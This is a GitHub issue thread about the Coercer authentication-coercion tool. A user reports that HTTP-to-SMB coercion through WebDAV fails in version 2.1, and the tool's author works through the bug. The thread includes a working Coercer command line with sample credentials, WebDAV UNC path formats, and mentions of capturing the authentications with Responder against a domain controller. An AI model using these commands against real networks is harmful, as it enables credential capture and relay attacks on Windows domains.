Closed jsdhasfedssad closed 1 year ago
p0dalirius
commented
1 year ago Hi!
Thanks for your feedback! It should work the same in 2.1-blackhat-edition, but indeed I saw some problems. I'm solving them right now.
One thing that I don't understand, is why I don't get any HTTP authentications when using this path format (Webdav @ 80) through RPC:
But when I paste it in explorer on my DC (Serv 2019, 10.0.17763.3287), it works absolutely fine:
And in responder, I get:
To be continued ==>
jsdhasfedssad
commented
1 year ago Something must have changed in your end between versions. Using Coercer 1.6 and the parameter "--webdav-host" coercing HTTP to SMB authentication works fine against the same DC which using version 2.1 does not.
p0dalirius
commented
1 year ago Yes I rewrote the entire code base so it might come from there. Can you clone the repo and try again from commit https://github.com/p0dalirius/Coercer/commit/6e4a814798167b1134c338867fc6ee9357ade73e ?
With Coercer on one terminal, and responder on another terminal:
./Coercer.py coerce -u 'Podalirius' -p 'Coerce123!' -d "COERCE.local" --auth-type http --http-port 80It calls the functions using \\WIN-A0AZERRE21@80/poc\File.txt so as far as I know, it should work perfectly for WebDAV.
Tell me if it works on your end 😊
jsdhasfedssad
commented
1 year ago I cloned main but this still does not work. I noticed that if the "-l" parameter is set to an IP, Coercer is using that as part of the "filename" as you call it in the output. That seems odd to me since one must use a NetBIOS name or a DNS name when coercing HTTP to SMB. I therefore changed the "-l" parameter to the NetBIOS name of Responder and then "filename" looks correct. However, coercing HTTP to SMB still does not work.
If I manually paste the "filename" "\\\WIN-N1YL1EAJ63J@80/Fjb\File.txt" into Windows Explorer on the target DC coercing HTTP to SMB works.
p0dalirius
commented
1 year ago Hi,
I've tested on the latest commit (https://github.com/p0dalirius/Coercer/commit/568358654dd3f21bc21130d2684718bad02cb55b at the time of writing) and coercing a remote machine to authenticate
to HTTP through WebDAV works fine. However, in fuzz and scan modes, it does not connect back to Coercer. This is probably due to something missing in the name resolution.
I've opened an issue about this here: https://github.com/p0dalirius/Coercer/issues/42
Closing this issue and working on making Coercer detect HTTP authentications!
Best regards,
Hi again!
You know I love your tool but today when I was attempting to trigger HTTP to SMB authentication using the new version I noticed that the parameter "
--webdav-host" no longer exists. I tested to use the NetBIOS name of Responder as input to the parameter "--target" but that only triggered a SMB to SMB authentication.Yes the role WebDAV was installed on the target DC and the service WebClient was running.
Is there any way to trigger HTTP to SMB authentication in version 2.1? If not I am forced to go back to version 1.6.
Thanks!